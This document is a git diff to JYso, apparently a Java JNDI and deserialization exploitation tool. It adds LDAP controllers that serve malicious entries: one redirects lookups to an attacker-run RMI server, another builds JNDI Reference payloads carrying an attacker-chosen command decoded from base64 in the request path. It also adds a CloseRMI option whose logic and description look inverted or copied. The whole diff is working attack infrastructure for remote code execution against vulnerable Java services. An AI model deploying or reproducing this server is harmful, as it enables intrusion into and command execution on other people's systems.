diff --git a/src/main/java/com/qi4l/JYso/Starter.java b/src/main/java/com/qi4l/JYso/Starter.java index b9f3e7c..be7bd62 100644 --- a/src/main/java/com/qi4l/JYso/Starter.java +++ b/src/main/java/com/qi4l/JYso/Starter.java @@ -33,7 +33,9 @@ public class Starter { } LdapServer.start(); HTTPServer.start(); - RMIServer.start(); + if (Config.CloseRMI) { + RMIServer.start(); + } } // 如果参数中包含-y,则启动ysoserial diff --git a/src/main/java/com/qi4l/JYso/controllers/BasicController.java b/src/main/java/com/qi4l/JYso/controllers/BasicController.java index 12d5ed9..5853b19 100644 --- a/src/main/java/com/qi4l/JYso/controllers/BasicController.java +++ b/src/main/java/com/qi4l/JYso/controllers/BasicController.java @@ -22,6 +22,7 @@ import static org.fusesource.jansi.Ansi.ansi; @LdapMapping(uri = {"/basic"}) public class BasicController implements LdapController { + private static String payloadType; //最后的反斜杠不能少 private final String codebase = Config.codeBase; diff --git a/src/main/java/com/qi4l/JYso/controllers/ldap2rmiController.java b/src/main/java/com/qi4l/JYso/controllers/ldap2rmiController.java new file mode 100644 index 0000000..3f0e0fe --- /dev/null +++ b/src/main/java/com/qi4l/JYso/controllers/ldap2rmiController.java @@ -0,0 +1,33 @@ +package com.qi4l.JYso.controllers; + +import com.qi4l.JYso.exceptions.IncorrectParamsException; +import com.qi4l.JYso.exceptions.UnSupportedActionTypeException; +import com.qi4l.JYso.exceptions.UnSupportedGadgetTypeException; +import com.qi4l.JYso.exceptions.UnSupportedPayloadTypeException; +import com.qi4l.JYso.gadgets.Config.Config; +import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult; +import com.unboundid.ldap.sdk.Entry; +import com.unboundid.ldap.sdk.LDAPResult; +import com.unboundid.ldap.sdk.ResultCode; + +@LdapMapping(uri = {"/ldap2rmi"}) +public class ldap2rmiController implements LdapController { + + private final String ip = Config.ip; + private final String rmiPort = String.valueOf(Config.rmiPort); + + @Override + public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception { + System.out.println("[LDAP] Change LDAP to RMI "); + Entry e = new Entry(base); + e.addAttribute("javaClassName", "foo"); + e.addAttribute("javaRemoteLocation", "rmi://" + ip + ":" + rmiPort); + result.sendSearchEntry(e); + result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); + } + + @Override + public void process(String base) throws UnSupportedPayloadTypeException, IncorrectParamsException, UnSupportedGadgetTypeException, UnSupportedActionTypeException { + + } +} diff --git a/src/main/java/com/qi4l/JYso/controllers/onlyRefController.java b/src/main/java/com/qi4l/JYso/controllers/onlyRefController.java new file mode 100644 index 0000000..d6f0656 --- /dev/null +++ b/src/main/java/com/qi4l/JYso/controllers/onlyRefController.java @@ -0,0 +1,123 @@ +package com.qi4l.JYso.controllers; + +import com.qi4l.JYso.enumtypes.GadgetType; +import com.qi4l.JYso.enumtypes.PayloadType; +import com.qi4l.JYso.exceptions.IncorrectParamsException; +import com.qi4l.JYso.exceptions.UnSupportedActionTypeException; +import com.qi4l.JYso.exceptions.UnSupportedGadgetTypeException; +import com.qi4l.JYso.exceptions.UnSupportedPayloadTypeException; +import com.qi4l.JYso.gadgets.ObjectPayload; +import com.qi4l.JYso.gadgets.utils.Serializer; +import com.qi4l.JYso.gadgets.utils.Util; +import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult; +import com.unboundid.ldap.sdk.Entry; +import com.unboundid.ldap.sdk.LDAPResult; +import com.unboundid.ldap.sdk.ResultCode; +import org.apache.commons.cli.CommandLine; + +import javax.naming.RefAddr; +import javax.naming.Reference; +import javax.naming.StringRefAddr; +import java.io.ByteArrayOutputStream; +import java.util.Base64; +import java.util.Enumeration; + +import static com.qi4l.JYso.gadgets.Config.Config.BCEL1; +import static org.fusesource.jansi.Ansi.ansi; + +@LdapMapping(uri = {"/onlyref"}) +public class onlyRefController implements LdapController{ + + public static String gadgetType; + public static String cmd11; + public static GadgetType gadgetType1; + public static CommandLine cmdLine; + private PayloadType payloadType; + private String params; + @Override + public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception { + System.out.println("[LDAP] Sending Reference object (onlyRef)"); + Entry e = new Entry(base); + try { + final Class payloadClass = ObjectPayload.Utils.getPayloadClass(gadgetType); + ObjectPayload payload = payloadClass.newInstance(); + Object object = payload.getObject(params); + + Reference ref = (Reference) object; + e.addAttribute("objectClass", "javaNamingReference"); + e.addAttribute("javaClassName", ref.getClassName()); + e.addAttribute("javaFactory", ref.getFactoryClassName()); + + Enumeration enumeration = ref.getAll(); + int posn = 0; + + while (enumeration.hasMoreElements()) { + StringRefAddr addr = (StringRefAddr) enumeration.nextElement(); + e.addAttribute("javaReferenceAddress", "#" + posn + "#" + addr.getType() + "#" + addr.getContent()); + posn ++; + } + result.sendSearchEntry(e); + result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); + } catch (Throwable er) { + System.err.println("Error while generating or serializing payload"); + er.printStackTrace(); + } + } + + @Override + public void process(String base) throws UnSupportedPayloadTypeException, IncorrectParamsException, UnSupportedGadgetTypeException, UnSupportedActionTypeException { + try { + base = base.replace('\\', '/'); + int firstIndex = base.indexOf("/"); + int secondIndex = base.indexOf("/", firstIndex + 1); + try { + gadgetType = base.substring(firstIndex + 1, secondIndex); + System.out.println(ansi().render("@|green [+] GaddgetType : |@" + gadgetType)); + } catch (IllegalArgumentException e) { + throw new UnSupportedGadgetTypeException("UnSupportGaddgetType >> " + base.substring(firstIndex + 1, secondIndex)); + } + int thirdIndex = base.indexOf("/", secondIndex + 1); + int fourIndex = base.indexOf("/", thirdIndex + 1); + String Ty1 = base.substring(thirdIndex + 1, fourIndex); + gadgetType1 = GadgetType.valueOf(Ty1.toLowerCase()); + // 若第三个斜杠不存在,则把其设置成为字符串的长度 + if (thirdIndex < 0) thirdIndex = base.length(); + try { + // 将类型值设为从第二个斜杠后的字符串到第三个斜杠前(不包括第三个斜杠)所表示的字符串转换为 PayloadType 枚举类型 + String Ty3 = base.substring(secondIndex + 1, thirdIndex); + payloadType = PayloadType.valueOf(Ty3.toLowerCase()); + } catch (IllegalArgumentException e) { + throw new UnSupportedPayloadTypeException("UnSupportedPayloadType: " + base.substring(secondIndex + 1, thirdIndex)); + } + + if (payloadType == PayloadType.sethttp) { + params = BCEL1; + System.out.println(ansi().render("@|green [+] command:|@" + BCEL1)); + } + + if (payloadType == PayloadType.command) { + + if (gadgetType1 == GadgetType.base64) { + cmd11 = Util.getCmdFromBase(base); + } + + if (gadgetType1 == GadgetType.base64Two) { + String encodedString = Util.getCmdFromBase(base); + byte[] decodedBytes = Base64.getDecoder().decode(encodedString); + String T1 = new String(decodedBytes); + byte[] decodedBytes1 = Base64.getDecoder().decode(T1); + cmd11 = new String(decodedBytes1); + } + + params = cmd11; + System.out.println(ansi().render("@|green [+] command:|@" + cmd11)); + } + + } catch (Exception e) { + if (e instanceof UnSupportedPayloadTypeException) throw (UnSupportedPayloadTypeException) e; + if (e instanceof UnSupportedGadgetTypeException) throw (UnSupportedGadgetTypeException) e; + + throw new IncorrectParamsException("Incorrect params >> " + base); + } + } +} diff --git a/src/main/java/com/qi4l/JYso/gadgets/Config/Config.java b/src/main/java/com/qi4l/JYso/gadgets/Config/Config.java index 91c190c..e193baa 100644 --- a/src/main/java/com/qi4l/JYso/gadgets/Config/Config.java +++ b/src/main/java/com/qi4l/JYso/gadgets/Config/Config.java @@ -41,6 +41,8 @@ public class Config { public static String USER = ""; @Parameter(names = {"-tP", " --TLSProxy"}, help = true, description = "TLS port forwarding", order = 5) public static boolean TLSProxy = false; + @Parameter(names = {"-cR", " --CloseRMI"}, help = true, description = "TLS port forwarding", order = 5) + public static boolean CloseRMI = false; @Parameter(names = {"-p", " --PASSWD"}, help = true, description = "ldap binding password", order = 5) public static String PASSWD = ""; @Parameter(names = {"-kF", " --keyFile"}, help = true, description = "Path to the TLS private key file", order = 5)